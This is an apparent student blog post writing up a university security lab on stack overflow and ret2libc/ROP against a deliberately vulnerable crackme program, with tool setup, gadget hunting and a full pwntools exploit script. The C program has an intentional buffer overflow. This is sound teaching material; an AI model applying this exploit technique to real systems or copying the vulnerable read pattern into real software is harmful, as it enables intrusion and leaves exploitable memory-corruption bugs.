<!doctype html><html lang=zh><head><title>信息系统安全Lab1 - 胡思乱想集散中心</title><meta charset=utf-8><meta http-equiv=x-ua-compatible content="IE=edge,chrome=1"><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,minimal-ui"><meta name=renderer content="webkit"><meta http-equiv=cache-control content="no-transform"><meta http-equiv=cache-control content="no-siteapp"><meta name=apple-mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-status-bar-style content="black"><meta name=format-detection content="telephone=no,email=no,adress=no"><meta name=theme-color content="#000000"><meta http-equiv=window-target content="_top"><meta name=description content="20220415信息系统安全（羌卫中老师）课后作业1 实验环境 操作系统 &amp;amp; 工具 操作系统：5.15.0-kali3-amd64 pwntools Installation — pwntools 4.7.0 documentation apt-get update apt-get install"><meta name=generator content="Hugo 0.97.0 with theme pure"><title>信息系统安全Lab1 - 胡思乱想集散中心</title><link rel=stylesheet href=https://qeryu.github.io/css/style.min.084a5eb24fb0cf9d5aade7246f19ba0c820cf904996a28ffe88039427693ac68.css><link rel=stylesheet href=https://cdn.staticfile.org/highlight.js/9.15.10/styles/github.min.css async><link rel=stylesheet href=https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css async><meta property="og:title" content="信息系统安全Lab1"><meta property="og:description" content="20220415信息系统安全（羌卫中老师）课后作业1 实验环境 操作系统 & 工具 操作系统：5.15.0-kali3-amd64 pwntools Installation — pwntools 4.7.0 documentation apt-get update apt-get install"><meta property="og:type" content="article"><meta property="og:url" content="https://qeryu.github.io/2022/04/%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8lab1/"><meta property="article:section" content="posts"><meta property="article:published_time" content="2022-04-12T14:41:57+08:00"><meta property="article:modified_time" content="2022-04-12T14:41:57+08:00"><meta itemprop=name content="信息系统安全Lab1"><meta itemprop=description content="20220415信息系统安全（羌卫中老师）课后作业1 实验环境 操作系统 & 工具 操作系统：5.15.0-kali3-amd64 pwntools Installation — pwntools 4.7.0 documentation apt-get update apt-get install"><meta itemprop=datePublished content="2022-04-12T14:41:57+08:00"><meta itemprop=dateModified content="2022-04-12T14:41:57+08:00"><meta itemprop=wordCount content="1295"><meta itemprop=keywords content="pwn,ret2libc,"><meta name=twitter:card content="summary"><meta name=twitter:title content="信息系统安全Lab1"><meta name=twitter:description content="20220415信息系统安全（羌卫中老师）课后作业1 实验环境 操作系统 & 工具 操作系统：5.15.0-kali3-amd64 pwntools Installation — pwntools 4.7.0 documentation apt-get update apt-get install"><!--[if lte IE 9]><script src=https://cdnjs.cloudflare.com/ajax/libs/classlist/1.1.20170427/classList.min.js></script><![endif]--><!--[if lt IE 9]><script src=https://cdn.jsdelivr.net/npm/html5shiv@3.7.3/dist/html5shiv.min.js></script>
<script src=https://cdn.jsdelivr.net/npm/respond.js@1.4.2/dest/respond.min.js></script><![endif]--></head><body class="main-center theme-black" itemscope itemtype=http://schema.org/WebPage><header class=header itemscope itemtype=http://schema.org/WPHeader><div class=slimContent><div class=navbar-header><div class="profile-block text-center"><a id=avatar href=https://github.com/qeryu target=_blank><img class="img-circle img-rotate" src=https://qeryu.github.io/avatar/qeryu.jpg width=200 height=200></a><h2 id=name class="hidden-xs hidden-sm">Qeryu</h2><h3 id=title class="hidden-xs hidden-sm hidden-md">信息安全学生</h3><small id=location class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i>Wuhan, China</small></div><div class=search id=search-form-wrap><form class="search-form sidebar-form"><div class=input-group><input type=text class="search-form-input form-control" placeholder=搜索>
<span class=input-group-btn><button type=submit class="search-form-submit btn btn-flat" onclick=return!1><i class="icon icon-search"></i></button></span></div><div class=ins-search><div class=ins-search-mask></div><div class=ins-search-container><div class=ins-input-wrapper><input type=text class=ins-search-input placeholder=想要查找什么... x-webkit-speech>
<button type=button class="close ins-close ins-selectable" data-dismiss=modal aria-label=Close><span aria-hidden=true>×</span></button></div><div class=ins-section-wrapper><div class=ins-section-container></div></div></div></div></form></div><button class="navbar-toggle collapsed" type=button data-toggle=collapse data-target=#main-navbar aria-controls=main-navbar aria-expanded=false>
<span class=sr-only>Toggle navigation</span>
<span class=icon-bar></span>
<span class=icon-bar></span>
<span class=icon-bar></span></button></div><nav id=main-navbar class="collapse navbar-collapse" itemscope itemtype=http://schema.org/SiteNavigationElement role=navigation><ul class="nav navbar-nav main-nav"><li class="menu-item menu-item-home"><a href=/><i class="icon icon-home-fill"></i>
<span class=menu-title>Home</span></a></li><li class="menu-item menu-item-archives"><a href=/posts/><i class="icon icon-archives-fill"></i>
<span class=menu-title>Archives</span></a></li><li class="menu-item menu-item-categories"><a href=/categories/><i class="icon icon-folder"></i>
<span class=menu-title>Categories</span></a></li><li class="menu-item menu-item-tags"><a href=/tags/><i class="icon icon-tags"></i>
<span class=menu-title>Tags</span></a></li><li class="menu-item menu-item-about"><a href=/about/><i class="icon icon-cup-fill"></i>
<span class=menu-title>About</span></a></li></ul></nav></div></header><aside class=sidebar itemscope itemtype=http://schema.org/WPSideBar><div class=slimContent><div class=widget><h3 class=widget-title>公告</h3><div class=widget-body><div id=board><div class=content><p>enjoy~</p></div></div></div></div><div class=widget><h3 class=widget-title>标签</h3><div id=tag-cloud-list class=widget-body><a href=https://qeryu.github.io/tags/arp-spoofing/ class=tag-list-link rel=1>arp-spoofing<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/beego/ class=tag-list-link rel=1>beego<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/blog/ class=tag-list-link rel=2>blog<span class=tag-list-count>2</span></a>
<a href=https://qeryu.github.io/tags/c++/ class=tag-list-link rel=1>c++<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/coolq/ class=tag-list-link rel=1>coolq<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/docker/ class=tag-list-link rel=2>docker<span class=tag-list-count>2</span></a>
<a href=https://qeryu.github.io/tags/eslint/ class=tag-list-link rel=1>eslint<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/fuzzing/ class=tag-list-link rel=3>fuzzing<span class=tag-list-count>3</span></a>
<a href=https://qeryu.github.io/tags/git/ class=tag-list-link rel=1>git<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/golang/ class=tag-list-link rel=1>golang<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/java/ class=tag-list-link rel=3>java<span class=tag-list-count>3</span></a>
<a href=https://qeryu.github.io/tags/javascript/ class=tag-list-link rel=3>javascript<span class=tag-list-count>3</span></a>
<a href=https://qeryu.github.io/tags/linux/ class=tag-list-link rel=1>linux<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/lstm/ class=tag-list-link rel=2>lstm<span class=tag-list-count>2</span></a>
<a href=https://qeryu.github.io/tags/maven/ class=tag-list-link rel=1>maven<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/metasploit3/ class=tag-list-link rel=1>metasploit3<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/montage/ class=tag-list-link rel=1>montage<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/pwn/ class=tag-list-link rel=1>pwn<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/python/ class=tag-list-link rel=2>python<span class=tag-list-count>2</span></a>
<a href=https://qeryu.github.io/tags/ret2libc/ class=tag-list-link rel=1>ret2libc<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/rnn/ class=tag-list-link rel=1>rnn<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/scapy/ class=tag-list-link rel=1>scapy<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/seed/ class=tag-list-link rel=1>seed<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/semanticfuzzing/ class=tag-list-link rel=1>semanticfuzzing<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/syn-flooding/ class=tag-list-link rel=1>syn-flooding<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/v2ray/ class=tag-list-link rel=1>v2ray<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/vim/ class=tag-list-link rel=1>vim<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/wordpress/ class=tag-list-link rel=1>wordpress<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/xml/ class=tag-list-link rel=1>xml<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/zest/ class=tag-list-link rel=2>zest<span class=tag-list-count>2</span></a>
<a href=https://qeryu.github.io/tags/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/ class=tag-list-link rel=1>学习笔记<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/ class=tag-list-link rel=1>渗透测试<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/%E7%88%AC%E8%99%AB/ class=tag-list-link rel=1>爬虫<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/%E7%A7%91%E5%AD%A6%E4%B8%8A%E7%BD%91/ class=tag-list-link rel=1>科学上网<span class=tag-list-count>1</span></a>
<a href=https://qeryu.github.io/tags/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/ class=tag-list-link rel=1>论文阅读<span class=tag-list-count>1</span></a></div><script>document.onreadystatechange=()=>{document.readyState==="complete"&&tagCloud("#tag-cloud-list a",8,20)};function tagCloud(n,s,o){let t=0,e=0;$(n).each(function(){let n=Number($(this).attr("rel"));t<n&&(t=n),(e>n||e==0)&&(e=n)});let i=(o-s)/(t-e);$(n).each(function(){let t=$(this).attr("rel")-e;$(this).css({"font-size":s+t*i+"px"})})}</script></div><div class=widget><h3 class=widget-title>分类</h3><div class=widget-body><ul class=category-list><li class=category-list-item><a href=https://qeryu.github.io/categories/cs61a/ class=category-list-link>cs61a</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/fuzzing/ class=category-list-link>fuzzing</a><span class=category-list-count>3</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/javascrip/ class=category-list-link>javascrip</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/lab/ class=category-list-link>lab</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/language/ class=category-list-link>language</a><span class=category-list-count>4</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/linux/ class=category-list-link>linux</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/lstm/ class=category-list-link>lstm</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/machine-learning/ class=category-list-link>machine-learning</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/notes/ class=category-list-link>notes</a><span class=category-list-count>3</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/web/ class=category-list-link>web</a><span class=category-list-count>6</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/xml/ class=category-list-link>xml</a><span class=category-list-count>1</span></li><li class=category-list-item><a href=https://qeryu.github.io/categories/%E7%BD%91%E5%AE%89%E5%AE%9E%E8%B7%B5/ class=category-list-link>网安实践</a><span class=category-list-count>1</span></li></ul></div></div><div class=widget><h3 class=widget-title>最新文章</h3><div class=widget-body><ul class="recent-post-list list-unstyled no-thumbnail"><li><div class=item-inner><p class=item-title><a href=https://qeryu.github.io/2022/04/%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8lab1/ class=title>信息系统安全Lab1</a></p><p class=item-date><time datetime="2022-04-12 14:41:57 +0800 +0800" itemprop=datePublished>2022-04-12</time></p></div></li><li><div class=item-inner><p class=item-title><a href=https://qeryu.github.io/2022/03/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-scapy%E5%AE%9E%E9%AA%8C/ class=title>计算机网络安全 Scapy实验</a></p><p class=item-date><time datetime="2022-03-30 21:43:09 +0800 +0800" itemprop=datePublished>2022-03-30</time></p></div></li><li><div class=item-inner><p class=item-title><a href=https://qeryu.github.io/2021/05/%E7%BD%91%E5%AE%89%E5%AE%9E%E8%B7%B5-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%952/ class=title>网安实践 渗透测试2</a></p><p class=item-date><time datetime="2021-05-26 10:06:51 +0800 +0800" itemprop=datePublished>2021-05-26</time></p></div></li><li><div class=item-inner><p class=item-title><a href=https://qeryu.github.io/2021/05/hexo%E8%BF%81hugo%E6%90%AC%E5%AE%B6%E8%AE%B0/ class=title>Hexo迁Hugo搬家记</a></p><p class=item-date><time datetime="2021-05-25 14:33:30 +0800 +0800" itemprop=datePublished>2021-05-25</time></p></div></li><li><div class=item-inner><p class=item-title><a href=https://qeryu.github.io/2020/09/%E7%9B%B8%E4%BC%BC%E8%AE%BA%E6%96%87lstm%E6%A8%A1%E5%9E%8B%E9%83%A8%E5%88%86%E5%AD%A6%E4%B9%A0/ class=title>相似论文LSTM模型部分学习</a></p><p class=item-date><time datetime="2020-09-20 22:32:27 +0000 UTC" itemprop=datePublished>2020-09-20</time></p></div></li></ul></div></div></div></aside><aside class="sidebar sidebar-toc collapse" id=collapseToc itemscope itemtype=http://schema.org/WPSideBar><div class=slimContent><h4 class=toc-title>文章目录</h4><nav id=toc class="js-toc toc"></nav></div></aside><main class=main role=main><div class=content><article id=- class="article article-type-" itemscope itemtype=http://schema.org/BlogPosting><div class=article-header><h1 itemprop=name><a class=article-title href=/2022/04/%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8lab1/>信息系统安全Lab1</a></h1><div class=article-meta><span class=article-date><i class="icon icon-calendar-check"></i>&nbsp;
<a href=https://qeryu.github.io/2022/04/%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8lab1/ class=article-date><time datetime="2022-04-12 14:41:57 +0800 +0800" itemprop=datePublished>2022-04-12</time></a></span>
<span class=article-category><i class="icon icon-folder"></i>&nbsp;
<a class=article-category-link href=/categories/lab/>lab</a></span>
<span class=article-tag><i class="icon icon-tags"></i>&nbsp;
<a class=article-tag-link href=/tags/pwn/>pwn</a>
<a class=article-tag-link href=/tags/ret2libc/>ret2libc</a></span>
<span class="post-wordcount hidden-xs" itemprop=wordCount>字数统计: 1295字</span>
<span class="post-readcount hidden-xs" itemprop=timeRequired>阅读时长: 3分</span></div></div><div class="article-entry marked-body js-toc-content" itemprop=articleBody><p>20220415信息系统安全（羌卫中老师）课后作业1</p><h1 id=实验环境>实验环境</h1><h2 id=操作系统--工具>操作系统 & 工具</h2><ul><li><p>操作系统：5.15.0-kali3-amd64</p></li><li><p>pwntools</p><p><a href=https://docs.pwntools.com/en/stable/install.html>Installation — pwntools 4.7.0 documentation</a></p><pre><code class=language-sh>apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
</code></pre><p>由于需要在命令行中使用相关工具（cyclic / readelf / &mldr;），需要将命令行工具所在位置<code>~/.local/bin</code>路径添加到<code>PATH</code>环境变量。<a href=https://blog.csdn.net/DLUTBruceZhang/article/details/8811456>linux下查看和添加PATH环境变量</a></p><p>安装完成后就可以在python环境外调用pwntools相关工具了</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415085545004.png alt=image-20220415085545004></p></li><li><p>pwngdb</p><p><a href=https://github.com/pwndbg/pwndbg>pwndbg/pwndbg: Exploit Development and Reverse Engineering with GDB Made Easy (github.com)</a></p><p>安装方式</p><pre><code class=language-sh>git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
</code></pre><p>安装后命令行输入<code>gdb</code>就能看到</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415085845627.png alt=image-20220415085845627></p></li><li><p>ghidra(optional)</p><p>感觉可以用IDA做同样的事，或许是我没用到</p><p><a href=https://ghidra-sre.org/>Ghidra (ghidra-sre.org)</a></p><p><a href=https://github.com/NationalSecurityAgency/ghidra/releases>Releases · NationalSecurityAgency/ghidra (github.com)</a></p></li></ul><h2 id=待rop程序>待rop程序</h2><pre><code class=language-c>#define _GNU_SOURCE
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;string.h&gt;
#include &lt;dlfcn.h&gt;

void start() {
  printf(&quot;IOLI Crackme Level 0x00\n&quot;);
  printf(&quot;Password:&quot;);

  char buf[64];
  memset(buf, 0, sizeof(buf));
  read(0, buf, 256);

  if (!strcmp(buf, &quot;250382&quot;))
    printf(&quot;Password OK :)\n&quot;);
  else
    printf(&quot;Invalid Password!\n&quot;);
}

int main(int argc, char *argv[]) {

  setreuid(geteuid(), geteuid());
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF,0);

  start();

  return 0;
}
</code></pre><p><a href=http://c.biancheng.net/cpp/html/268.html>setvbuf()：设置文件流的缓冲区</a></p><h2 id=编译--系统选项>编译 & 系统选项</h2><p><strong>关闭/开启Stack保护(stack canary)</strong>（默认开启）</p><p>-fno-stack-protector
-fstack-protector</p><p><strong>关闭NX</strong>（默认开启）</p><p>-z execstack</p><p><strong>关闭/开启 pie</strong>（默认开启）</p><p>-no-pie
-pie</p><p><strong>32bit 编译选项(64bit OS上)</strong>（默认64位）</p><p>-m32</p><p><strong>ASLR设置</strong>（关闭置0）</p><p>cat /proc/sys/kernel/randomize_va_space
sudo sysctl -w kernel.randomize_va_space=? (0或2)</p><pre><code class=language-sh># 完整编译指令
gcc stack.c -o stack -fno-stack-protector
</code></pre><h1 id=exp>Exp</h1><h2 id=cyclic-获取溢出点>cyclic 获取溢出点</h2><p>进入pwngdb，使用cyclic命令生成一段100字节的字符串作为输入，可以看到程序崩溃并给出一个无效地址。</p><pre><code class=language-sh>$ gdb ./stack
pwndbg&gt; cyclic 50
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg&gt; run
pwndbg&gt; run
Starting program: /home/kali/Desktop/SysSecurity/stack
IOLI Crackme Level 0x00
Password:aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
</code></pre><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415092729679.png alt=image-20220415092729679></p><p>用该地址回到cyclic进行比较，可以知道溢出点的位置是76</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415093001780.png alt=image-20220415093001780></p><h2 id=获取pr--ppr--pppr地址>获取PR / PPR / PPPR地址</h2><p>在命令行中使用<code>ropper</code>工具</p><pre><code class=language-sh>ropper --file ./stack_test | grep &quot;pop&quot; | grep &quot;ret&quot;
</code></pre><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415093804493.png alt=image-20220415093804493></p><p>可以从中找到pop-ret / pop-pop-ret / pop-pop-pop-ret的地址，这是这几个gadget在程序中的偏移地址，在代码中使用时需要加上程序加载的基地址。</p><h2 id=获取libc函数地址>获取libc函数地址</h2><p>在pwndbg中使用print命令即可获得</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415094300651.png alt=image-20220415094300651></p><p>还可以通过readelf工具获取以上函数在libc文件中的偏移地址，从而计算出libc的加载地址</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415094449437.png alt=image-20220415094449437></p><p>两个system函数的地址相减可以确定载入地址</p><h2 id=获取特殊字符串位置>获取特殊字符串位置</h2><pre><code class=language-sh># 查找程序中的特殊字符串位置
ropper --file ./stack --string &quot;Password OK&quot;
# 或者
ROPgadget --binary ./stack --string 'Password OK'
</code></pre><p>这里查到的位置是偏移地址</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415095512969.png alt=image-20220415095512969></p><p>这是开启了PIE的缘故，如果关闭PIE则会获得执行时的地址</p><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415095613466.png alt=image-20220415095613466></p><p>由于PIE是默认打开的，所以以下还是以PIE打开的情况进行分析</p><p>获取字符串在执行时的位置需要在pwndbg中，在程序执行时使用<code>search</code>命令查找</p><pre><code class=language-sh># 命令行执行
gdb ./stack

# pwndbg执行
b main					# 在main函数执行前打上断点
r
search &quot;Password OK&quot;
</code></pre><p><img src=https://raw.githubusercontent.com/Qeryu/PicBed/master/blog/image-20220415100058834.png alt=image-20220415100058834></p><p>获取成功的字符串地址后即可在程序中输出成功提示</p><p>构造payload</p><pre><code class=language-python>payload = flat(['a'*76, printf_addr, PR, str_print])
</code></pre><p>也算是完成了参考资料中的一个task1</p><p><a href=https://tc.gts3.org/cs6265/2021/tut/tut06-01-rop.html>Tut06-1: Return-oriented Programming - CS6265: Information Security Lab (gts3.org)</a></p><h2 id=exploit1py-代码>exploit1.py 代码</h2><p>查找完以上信息后，即可使用这个代码在开PIE关ASLR的环境下exploit了</p><pre><code class=language-python>#!/usr/bin/env python3

from pwn import *

p = process(&quot;./stack&quot;)

PR = 0x0000138b
PPR = 0x0000138a
PPPR = 0x00001389

payload = b'A' * 76

system_addr = 0xf7e00d00
system_offset = 0x00033cc0
libc_addr = system_addr - system_offset
puts_addr = 0xf7e2b4e0
printf_addr = 0xf7e0ff10
open_addr = 0xf7ead770
read_addr = 0xf7eadc90
write_addr = 0xf7eadd50
gets_addr = 0xf7e2aa00
exit_addr = 0xf7df3680

str_passwd_ok_offset = 0x00002031
bss_offset = 0x00004038
bss2_offset = 0x00004038 + 20
str_passwd_ok_addr = 0x56557031
load_addr = str_passwd_ok_addr - str_passwd_ok_offset
str_passwd_input_offset = 0x00002008

payload += p32(gets_addr)
payload += p32(PR + load_addr)
payload += p32(bss_offset + load_addr)

payload += p32(puts_addr)
payload += p32(PR + load_addr)
payload += p32(bss_offset + load_addr)

payload += p32(open_addr)
payload += p32(PPR+ load_addr)
payload += p32(bss_offset + load_addr)
payload += p32(0)

payload += p32(read_addr)
payload += p32(PPPR+ load_addr)
payload += p32(3)
payload += p32(bss2_offset + load_addr)
payload += p32(20)

payload += p32(write_addr)
payload += p32(PPPR+ load_addr)
payload += p32(1)
payload += p32(bss2_offset + load_addr)
payload += p32(20)

payload += p32(exit_addr)
payload += p32(0xdeadbeef)
payload += p32(0)

print(payload)

p.sendline(payload)

p.interactive()
</code></pre><h1 id=参考内容>参考内容</h1><p><a href=https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/basic-rop/#3>基本 ROP - CTF Wiki (ctf-wiki.org)</a></p><p><a href=https://tc.gts3.org/cs6265/2021/tut/>Tut00: Introduction - CS6265: Information Security Lab (gts3.org)</a></p></div><div class=article-footer><blockquote class=mt-2x><ul class="post-copyright list-unstyled"><li class="post-copyright-link hidden-xs"><strong>本文链接:</strong>
<a href=https://qeryu.github.io/2022/04/%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8lab1/ title=信息系统安全Lab1 target=_blank rel=external>https://qeryu.github.io/2022/04/%E4%BF%A1%E6%81%AF%E7%B3%BB%E7%BB%9F%E5%AE%89%E5%85%A8lab1/</a></li><li class=post-copyright-license><strong>License:</strong>
<a href=http://creativecommons.org/licenses/by/4.0/deed.zh target=_blank rel=external>CC BY 4.0 CN</a></li></ul></blockquote><div class="panel panel-default panel-badger"><div class=panel-body><figure class=media><div class=media-left><a href=https://github.com/qeryu target=_blank class="img-burn thumb-sm visible-lg"><img src=https://qeryu.github.io/avatar/qeryu.jpg class="img-rounded w-full" alt></a></div><div class=media-body><h3 class=media-heading><a href=https://github.com/qeryu target=_blank><span class=text-dark>Qeryu</span><small class=ml-1x>信息安全学生</small></a></h3><div>Good Good Study, Day Day Up~</div></div></figure></div></div></div></article></div><nav class="bar bar-footer clearfix" data-stick-bottom><div class=bar-inner><ul class="pager pull-left"><li class=prev><a href=https://qeryu.github.io/2022/03/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8-scapy%E5%AE%9E%E9%AA%8C/ title="计算机网络安全 Scapy实验"><i class="icon icon-angle-left" aria-hidden=true></i><span>&nbsp;&nbsp;下一篇</span></a></li><li class=toggle-toc><a class="toggle-btn collapsed" data-toggle=collapse href=#collapseToc aria-expanded=false title=文章目录 role=button><span>[&nbsp;</span><span>文章目录</span>
<i class="text-collapsed icon icon-anchor"></i>
<i class="text-in icon icon-close"></i>
<span>]</span></a></li></ul><div class=bar-right><div class=share-component data-sites=weibo,qq,wechat,facebook,twitter data-mobile-sites=weibo,qq,qzone></div></div></div></nav></main><footer class=footer itemscope itemtype=http://schema.org/WPFooter><ul class=social-links><li><a href=https://github.com/qeryu target=_blank title=github data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li><li><a href=https://qeryu.github.io/index.xml target=_blank title=rss data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li></ul><div class=copyright>&copy;2019 -
2022<div class=publishby>Theme by <a href=https://github.com/xiaoheiAh target=_blank>xiaoheiAh </a>base on<a href=https://github.com/xiaoheiAh/hugo-theme-pure target=_blank> pure</a>.</div></div></footer><script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_SVG"></script>
<script type=text/x-mathjax-config>
    MathJax.Hub.Config({
            showMathMenu: false, //disables context menu
            tex2jax: {
            inlineMath: [ ['$','$'], ['\\(','\\)'] ]
           }
    });
</script><script src=https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js></script>
<script>window.jQuery||document.write('<script src="js/jquery.min.js"><\/script>')</script><script type=text/javascript src=https://cdn.staticfile.org/highlight.js/9.15.10/highlight.min.js></script>
<script type=text/javascript src=https://cdn.staticfile.org/highlight.js/9.15.10/languages/python.min.js defer></script>
<script type=text/javascript src=https://cdn.staticfile.org/highlight.js/9.15.10/languages/javascript.min.js defer></script><script>hljs.configure({tabReplace:"    ",classPrefix:''}),hljs.initHighlightingOnLoad()</script>
<script src=https://qeryu.github.io/js/application.min.c181e6b0c036798c7731cfb85b41b44c80689fd48fee546b73d449386ce6ccfb.js></script>
<script src=https://qeryu.github.io/js/plugin.min.5c7ae0f9d1f515776ebc5e20dd06a3552ddc2a373d481d1c03bd7dfa574bec41.js></script>
<script>(function(e){var t={TRANSLATION:{POSTS:"文章",PAGES:"页面",CATEGORIES:"分类",TAGS:"标签",UNTITLED:"(未命名)"},ROOT_URL:"https://qeryu.github.io/",CONTENT_URL:"https://qeryu.github.io//searchindex.json "};e.INSIGHT_CONFIG=t})(window)</script><script type=text/javascript src=https://qeryu.github.io/js/insight.min.853c5d4062a8c262b2490c70df2f6d2b232483f85227b30b28013788b8c4da8ab59c1a735b9b31c9006f2962ef62213fea9d17cb9469c297f201772ce94e8fdf.js defer></script>
<script src=https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js></script>
<script>tocbot.init({tocSelector:".js-toc",contentSelector:".js-toc-content",headingSelector:"h1, h2, h3",hasInnerContainers:!0})</script></body></html>